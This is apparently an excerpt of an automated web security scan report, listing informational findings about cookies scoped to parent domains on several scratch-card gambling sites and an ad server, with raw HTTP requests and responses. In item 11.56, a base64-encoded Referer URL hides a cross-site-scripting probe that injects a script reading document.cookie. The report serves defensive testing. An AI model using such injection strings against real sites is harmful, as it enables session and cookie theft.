Date: Mon, 16 May 2011 12:14:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.51. http://home.okscratchcards.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_20=EncryptedUniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 11:41:04 GMT; path=/
UniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=20&LNG=~ENG& HTTP/1.1
Host: home.okscratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.okscratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=80613129.885970471.1305546061.1305546061.1305546061.1; __utmc=80613129; __utmb=80613129.1.10.1305546061

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Set-Cookie: ASP.NET_SessionId=a4hnfa45jaet4yaah01vnr55; path=/; HttpOnly
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 11:41:04 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: UniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Vary: Accept-Encoding
Content-Length: 131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

11.52. http://it.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0zlhnt55momsyp55ncyjqa55; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.53. http://it.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=CD543190925D81437E19D693AEB6F08F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
UniqueVisitorID=CD543190925D81437E19D693AEB6F08F; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vfoiefqow3k4oyvyuuo5pp45; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=CD543190925D81437E19D693AEB6F08F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=CD543190925D81437E19D693AEB6F08F; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.54. http://it.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:39:07 GMT; path=/
UniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qheiwe45dbfxdf55gz1vhzbv; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:39:07 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: UniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.55. http://it.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:58:46 GMT; path=/
UniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ukpfhp45vzrewmabzwaz4dvm; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:58:46 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: UniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.56. http://m.xp1.ru4.com/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/ad

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; domain=.ru4.com; path=/
P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad?_o=1807966&_t=17210472&_c=17210403&_b=17210472&ssv_c3=Y&ssv_b=c3&ssv_1=285952721 HTTP/1.1
Host: m.xp1.ru4.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/285952721/direct;wi.300;hi.250/01?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrwXH9h3RTc7hO4b2lAfr4vmUCfjo9tQBiKHvmxzyn-b8AwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0yODY3NzEzMTkzOTYyOTk2sgEQd3d3Lm1ldGFjYWZlLmNvbboBCjMwMHgyNTBfYXPIAQnaAWhodHRwOi8vd3d3Lm1ldGFjYWZlLmNvbS9mcGxheWVyLz80NzAyZCUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFYmU5NmEyM2YzYTM9MZgCsgXAAgHIAubpuAvgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2eoAwH1AwAAAITgBAGABpG6trfLsvz3Sw%26num%3D1%26sig%3DAGiWqtx_Iomlu9mCZTvmsPS82Ewo2V9C3Q%26client%3Dca-pub-2867713193962996%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT%2526redirectURL%253D
Cookie: X1ID=AA-00000001931708427; M62795-52786=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-length: 0
Pragma: no-cache
Set-cookie: 17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; domain=.ru4.com; path=/
Set-cookie: O1807966=256; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT
Set-cookie: C17210403=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT
Location: http://http.content.ru4.com/images/pixel.gif
Connection: close

11.57. http://nl.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_12=EncryptedUniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:30 GMT; path=/
UniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rdea0n55hhroqxblgqaveqye; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: UniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.58. http://nl.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_27=EncryptedUniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:19 GMT; path=/
UniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q2caq0iw5kh0ygn1y3sdtjya; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:19 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: UniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.59. http://nl.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_1=EncryptedUniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:09:23 GMT; path=/
UniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=of4xfwah3rgoyu55lp4wc355; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:09:23 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: UniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.60. http://nl.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:30 GMT; path=/
UniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c40a2w55f4jphb55iu3y3fjz; path=/; HttpOnly
Set-Cookie: LanguageCode=DUT; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:30 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: UniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: LanguageCode=DUT; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
